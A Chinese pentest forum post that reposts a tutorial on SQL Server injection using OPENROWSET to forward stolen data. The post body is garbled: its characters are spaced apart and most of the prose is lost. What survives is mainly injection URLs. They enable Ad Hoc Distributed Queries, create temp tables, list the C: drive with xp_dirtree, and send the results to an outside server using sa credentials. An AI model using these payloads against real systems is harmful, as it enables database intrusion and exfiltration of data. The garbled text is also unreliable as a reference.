设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 数据库 [26625] 2020-04-08_SQL注入基础sqlserveropenrowset转 ...
返回列表 发新帖
查看: 0|回复: 0

[26625] 2020-04-08_SQL注入基础sqlserveropenrowset转发利用

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 4 天前 | 显示全部楼层 |阅读模式
2020-04-08_SQL注入基础sqlserveropenrowset转发利用 S Q L   s q l s e r v e r   o p e n r o w s e t   m O o n   m o o n s e c   2 0 2 0 - 0 4 - 0 8 s q l s e r v e r   o p e n r o w s e t 1   使 s q l s e r v e r s q l s e r v e r A d   H o c   D i s t r i b u t e d   Q u e r i e s ; e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 1   r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   ' A d   H o c   D i s t r i b u t e d   Q u e r i e s ' , 1   r e c o n f i g u r e 使 A d   H o c   D i s t r i b u t e d   Q u e r i e s ; e x e c   s p _ c o n f i g u r e   ' A d   H o c   D i s t r i b u t e d   Q u e r i e s ' , 0   r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' , 0   r e c o n f i g u r e 2 h t t p : / / w w w . d e m o 1 . c o m / i n d e x . a s p x ? i d = 1 ; e x e c   s p _ c o n f i g u r e   s h o w   a d v a n c e d   o p t i o n s , 1   r e c o n f i g u r e ; e x e c   s p _ c o n f i g u r e   A d   H o c   D i s t r i b u t e d   Q u e r i e s , 1 r e c o n f i g u r e c r e a t e   t a b l e   # # v e r s i o n   ( V E R S I O N   v a r c h a r ( 5 0 0 ) ) 3 h t t p : / / w w w . d e m o 1 . c o m / i n d e x . a s p x ? i d = 1 ; i n s e r t   i n t o   O P E N R O W S E T ( ' S Q L O L E D B ' ,   ' s e r v e r = 1 9 2 . 1 6 8 . 0 . 1 2 2 ; u i d = s a ; p w d = 1 2 3 4 5 6 ' ,   ' s e l e c t   *   f r o m % 2 3 % 2 3 v e r s i o n '   )   s e l e c t   D B _ N A M E ( )   s q l s e r v e r s e l e c t   *   f r o m   # # v e r s i o n
4 c r e a t e   t a b l e   # # n o n a m e d (   d i r   n t e x t ,   n u m   i n t   ) h t t p : / / w w w . d e m o 1 . c o m / i n d e x . a s p x ? i d = 1 ; c r e a t e   t a b l e   % 2 3 % 2 3 n o n a m e d (   d i r   n t e x t ,   n u m   i n t   ) 5 i n s e r t   % 2 3 % 2 3 n o n a m e d   e x e c u t e   m a s t e r . . x p _ d i r t r e e   ' c : / ' , 1 n o n a m e d c h t t p : / / w w w . d e m o 1 . c o m / i n d e x . a s p x ? i d = 1 ; i n s e r t   % 2 3 % 2 3 n o n a m e d   e x e c u t e   m a s t e r . . x p _ d i r t r e e   ' c : / ' , 1 1 9 2 . 1 6 8 . 0 . 1 2 2   s q l s e r v e r h t t p : / / w w w . d e m o 1 . c o m / i n d e x . a s p x ? i d = 1 ; i n s e r t   i n t o   O P E N R O W S E T ( ' S Q L O L E D B ' ,   ' s e r v e r = 1 9 2 . 1 6 8 . 0 . 1 2 2 ; u i d = s a ; p w d = 1 2 3 4 5 6 ' ,   ' s e l e c t   *   f r o m % 2 3 % 2 3 n o n a m e d '   )   s e l e c t   *   f r o m   % 2 3 % 2 3 n o n a m e d s q l s e r v e r     s e l e c t   *   f r o m   % 2 3 % 2 3 n o n a m e d
6 7

回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 07:25 , Processed in 0.461557 second(s), 31 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表